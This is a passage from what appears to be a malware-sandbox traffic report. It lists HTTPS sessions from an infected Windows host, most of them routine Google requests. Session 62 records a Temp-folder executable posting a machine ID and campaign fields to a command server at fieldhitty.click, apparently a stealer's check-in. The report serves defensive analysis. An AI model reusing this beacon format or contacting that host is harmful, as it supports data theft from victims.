74 54 46 49 32 64 6d 78 79 55 47 31 4e 65 46 64 77 52 46 64 69 62 44 4a 4e 54 46 56 4c 4d 6b 39 36 52 32 64 5a 56 7a 4e Data Ascii: Ulg4QUozbWVwYnpPMHQzQnh0VC9sbm4vZlZYL2J6Ny9nMTVFVllmeDh2WC9ZU010TUczL3Q2U3d3TlRpVXlocmc2bnEzK0dhck1WZGRKNDVUb1JPTldZWU8zcFphSkorVTNDdlJVT0RQRldtZUlSZVBHZWJRVTNOVVR4aUwxblpWamovdFpoK0pFRitRVjE4bExYZHo5T2tSVXJBMXVjNUptTFI2dmxyUG1NeFdwRFdibDJNTFVLMk96R2dZVzN
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 4a 78 55 54 64 34 59 57 35 31 4f 54 4a 50 65 54 6c 4f 54 57 4a 30 4e 43 39 42 4e 45 4a 68 53 58 5a 49 4e 57 6c 4d 62 46 4e 58 51 7a 42 45 4d 6c 42 78 56 47 67 77 55 48 49 77 54 54 6c 73 55 32 56 36 4d 54 64 4f 62 55 31 6f 64 46 6b 72 5a 6e 6f 35 54 45 68 58 64 32 64 58 52 56 6c 71 61 6d 74 53 52 6b 4e 78 53 47 5a 45 59 6d 64 70 54 6c 4a 33 4c 33 67 76 56 57 56 4f 64 54 52 69 55 58 68 44 4e 6e 70 72 5a 6c 6b 35 52 32 78 46 63 6e 51 33 52 32 74 30 57 6d 68 71 4f 47 74 6f 54 43 39 6d 53 6a 56 56 56 47 64 55 59 56 46 45 61 30 56 72 57 6c 56 42 53 32 6c 47 4d 58 56 6f 4d 32 56 69 4e 47 45 79 63 54 68 46 63 48 52 6f 51 56 52 68 4e 53 74 76 52 6c 4e 6a 52 48 52 75 57 48 6c 4a 4e 48 6b 30 64 6a 52 57 59 6e 67 30 61 31 46 33 54 32 64 53 65 55 4a 4d 56 79 74 43 4d Data Ascii: JxUTd4YW51OTJPeTlOTWJ0NC9BNEJhSXZINWlMbFNXQzBEMlBxVGgwUHIwTTlsU2V6MTdObU1odFkrZno5TEhXd2dXRVlqamtSRkNxSGZEYmdpTlJ3L3gvVWVOdTRiUXhDNnprZlk5R2xFcnQ3R2t0WmhqOGtoTC9mSjVVVGdUYVFEa0VrWlVBS2lGMXVoM2ViNGEycThFcHRoQVRhNStvRlNjRHRuWHlJNHk0djRWYng0a1F3T2dSeUJMVytCM
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 52 47 68 73 64 46 6f 33 55 45 5a 36 5a 54 4e 45 4f 58 70 55 57 6b 70 57 5a 33 46 4f 63 55 4e 54 5a 6b 56 4c 64 44 56 4a 56 45 4e 31 62 45 6c 71 52 58 64 68 4d 43 39 76 61 57 73 31 65 6a 6c 56 65 6e 41 33 64 56 45 77 63 57 70 69 4e 54 4d 79 59 6e 42 72 62 57 46 6f 4d 6d 6c 52 65 55 68 52 4c 31 68 4d 62 6a 68 53 59 56 68 73 52 55 39 50 57 44 64 4a 4f 57 4e 52 63 54 41 34 63 56 5a 72 61 31 59 34 4c 32 30 31 65 6a 5a 55 4c 7a 5a 55 59 6d 4a 77 57 6c 4d 32 57 6a 6c 4c 52 69 39 78 5a 58 49 79 55 56 59 77 54 7a 4d 33 56 44 4a 4f 52 56 42 6e 61 56 4a 4b 59 6c 4e 75 4e 6c 4e 59 61 44 42 35 53 32 31 4c 4c 31 64 54 64 31 5a 32 56 32 4a 48 55 33 70 4f 65 58 6c 45 52 57 56 71 4e 57 56 4c 63 30 39 55 55 44 42 54 62 48 55 77 61 58 42 6b 5a 57 68 33 61 45 31 4c 56 47 56 Data Ascii: RGhsdFo3UEZ6ZTNEOXpUWkpWZ3FOcUNTZkVLdDVJVEN1bElqRXdhMC9vaWs1ejlVenA3dVEwcWpiNTMyYnBrbWFoMmlReUhRL1hMbjhSYVhsRU9PWDdJOWNRcTA4cVZra1Y4L201ejZULzZUYmJwWlM2WjlLRi9xZXIyUVYwTzM3VDJORVBnaVJKYlNuNlNYaDB5S21LL1dTd1Z2V2JHU3pOeXlERWVqNWVLc09UUDBTbHUwaXBkZWh3aE1LVGV
2024-12-22 01:19:02 UTC	29	IN	Data Raw: 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 5d 7d 5d 0d 0a Data Ascii: "QUERY","QUERY","ENTITY"]}]
2024-12-22 01:19:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	50257	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:01 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:19:02 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:19:02 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:19:02 UTC	372	IN	Data Raw: 31 38 62 33 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 18b3)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-22 01:19:02 UTC	399	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 37 37 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 2c 31 30 32 32 37 38 32 30 38 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700277,3700942,3701384,102278205,102278208],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(func
2024-12-22 01:19:02 UTC	237	IN	Data Raw: 65 37 0d 0a 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 0d 0a Data Ascii: e7C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpExcep
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 Data Ascii: 8000tion(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c Data Ascii: ew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a\|0:void 0};_.Od\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4e 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 Data Ascii: eturn _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return _.Nd(_.Ec(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.tb(_.be(a,b),c)};_.ce\u003dfunction(a,b,c\u003d0){return _.tb(_.S(a,b),c)};_.e

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	50258	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:01 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:19:02 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:19:02 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:19:02 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-22 01:19:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50263	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:02 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IAOCVBVCFD2DKJ4Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1403 Host: fieldhitty.click
2024-12-22 01:19:02 UTC	1403	OUT	Data Raw: 2d 2d 49 41 4f 43 56 42 56 43 46 44 32 44 4b 4a 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 41 4f 43 56 42 56 43 46 44 32 44 4b 4a 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 41 4f 43 56 42 56 43 46 44 32 44 4b 4a 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 49 41 4f 43 56 42 56 Data Ascii: --IAOCVBVCFD2DKJ4QContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--IAOCVBVCFD2DKJ4QContent-Disposition: form-data; name="pid"1--IAOCVBVCFD2DKJ4QContent-Disposition: form-data; name="lid"PvbArZ----IAOCVBV
2024-12-22 01:19:03 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8n7mlaknhsn0ekq4dkl2t1caeh; expires=Wed, 16 Apr 2025 19:05:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWrk6U1Pwmo54oqkbGRMzRsZhdZiDKzAMxqaIOtyg7QZAj21JGaJ6D8NPBL%2FrTiCTerX5ec%2BZ3wQUU8KYckCee%2BT2TOoFlik6nt%2BA93xRWl0KjKUzXLOBQ5Z6%2BVpb0tm%2B3GF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c480a9fa67cb1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1785&rtt_var=690&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2318&delivery_rate=1563169&cwnd=235&unsent_bytes=0&cid=c3fc45603f625d66&ts=1071&x=0"
2024-12-22 01:19:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:19:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	50262	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:03 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:19:03 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:03 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-dFP9q_2wId9wZrIe0IyxuA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: 